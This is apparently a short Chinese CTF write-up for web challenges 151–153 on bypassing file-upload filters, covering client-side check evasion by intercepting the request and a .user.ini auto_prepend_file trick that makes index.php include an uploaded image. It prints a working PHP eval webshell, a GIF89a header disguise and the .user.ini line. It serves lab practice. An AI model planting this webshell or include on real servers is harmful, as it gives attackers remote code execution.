Web151
前台校驗,無法上傳PHP文件、jpg圖片,上傳png圖片馬,抓包改后綴
Web152
解法同151
Web153
不知道過濾什么,看了WP:
我們可以在.user.ini中設置php.ini中PHP_INI_PERDIR和PHP_INI_USER模式的 INI 設置,而且只要是在使用CGI/FastCGI模式的服務器上都可以使用.user.ini
auto_prepend_file和auto_append_file設置我們指定一個文件(如a.jpg),那么該文件就會被包含在要執行的php文件中(如index.php),
類似於在index.php中插入一句:require(./a.jpg);
這兩個設置的區別只是在於auto_prepend_file是在文件前插入;auto_append_file在文件最后插入(當文件調用的有exit()時該設置無效)
所以要求當前目錄必須要有php文件getflag思路:我們上傳一個.user.ini 文件設置一個文件1.jpg然后訪問index.php就相當於包含了1.jpg
其中GIF89a是告訴系統,根據圖形交換格式(GIF)89a版進行格式化,生成圖形
以上大致意思是PHP有一個可以重寫的配置文件,類似於apache的.htaccess繞過,但是PHP這個比較苛刻,需要開啟一定功能才能使用,題目是默認開啟的
1.我們先上傳.user.ini文件(當然文件名抓包之后再修改)
2.然后再上傳包含的PHP文件,訪問/upload/index.php自動包含
3.使用hackbar或者蟻劍尋找並讀取flag
我的文件如下:
<?php @eval($_POST['pass']);?>
GIF89a
auto_prepend_file=pass.jpg
上傳之后蟻劍連接,在html目錄下找到flag
